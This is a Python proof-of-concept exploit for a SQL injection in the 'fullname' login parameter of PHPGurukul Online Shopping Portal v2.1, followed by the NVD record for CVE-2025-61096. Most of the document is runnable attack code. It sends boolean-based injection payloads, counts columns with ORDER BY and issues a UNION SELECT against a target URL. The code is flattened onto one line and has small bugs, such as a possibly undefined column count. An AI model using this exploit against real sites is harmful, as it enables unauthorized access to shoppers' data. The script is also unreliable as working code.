CVE-2025-61096

# CVE-2025-61096 - PHPGurukul Online Shopping Portal v2.1 SQL Injection PoC # Vulnerability Location: /shopping/login.php # Vulnerable Parameter: fullname import requests TARGET_URL = "http://target.com/shopping/login.php" # Step 1: Test for SQL injection vulnerability using a simple boolean-based payload def test_sqli(target_url): # Normal request baseline normal_payload = { "fullname": "admin", "password": "test123", "login": "Login" } baseline_resp = requests.post(target_url, data=normal_payload) baseline_len = len(baseline_resp.text) # Boolean-based TRUE condition payload true_payload = { "fullname": "admin' OR '1'='1' -- -", "password": "test123", "login": "Login" } true_resp = requests.post(target_url, data=true_payload) true_len = len(true_resp.text) # Boolean-based FALSE condition payload false_payload = { "fullname": "admin' OR '1'='2' -- -", "password": "test123", "login": "Login" } false_resp = requests.post(target_url, data=false_payload) false_len = len(false_resp.text) print(f"[+] Baseline response length: {baseline_len}") print(f"[+] TRUE condition response length: {true_len}") print(f"[+] FALSE condition response length: {false_len}") if true_len != false_len: print("[!] Vulnerability confirmed: SQL injection in 'fullname' parameter") return True return False # Step 2: Extract database version using UNION-based injection def extract_db_info(target_url, columns=5): # Determine number of columns via ORDER BY technique for i in range(1, 15): payload = { "fullname": f"' ORDER BY {i} -- -", "password": "test", "login": "Login" } r = requests.post(target_url, data=payload) if "error" in r.text.lower() or r.status_code == 500: print(f"[+] Number of columns: {i - 1}") col_count = i - 1 break # UNION-based extraction of database version union_payload = { "fullname": f"' UNION SELECT {','.join(['NULL'] * col_count)} -- -", "password": "test", "login": "Login" } r = requests.post(target_url, data=union_payload) print(f"[+] UNION SELECT response: {r.text[:500]}") if __name__ == "__main__": print(f"[*] Testing CVE-2025-61096 against {TARGET_URL}") if test_sqli(TARGET_URL): extract_db_info(TARGET_URL)

{"cve": {"id": "CVE-2025-61096", "sourceIdentifier": "[email protected]", "published": "2025-10-02T15:15:58.857", "lastModified": "2025-10-07T18:14:45.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPGurukul Online Shopping Portal Project v2.1 is vulnerable to SQL Injection in /shopping/login.php via the fullname parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:online_shopping_portal_project:2.1:*:*:*:*:*:*:*", "matchCriteriaId": "9BFA0794-9275-412B-9948-68D847E67F8E"}]}]}], "references": [{"url": "https://github.com/sanin-s1r3n/CVE-Research/blob/main/CVE-2025-61096", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.linkedin.com/in/shuvo-ahmed-sanin/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}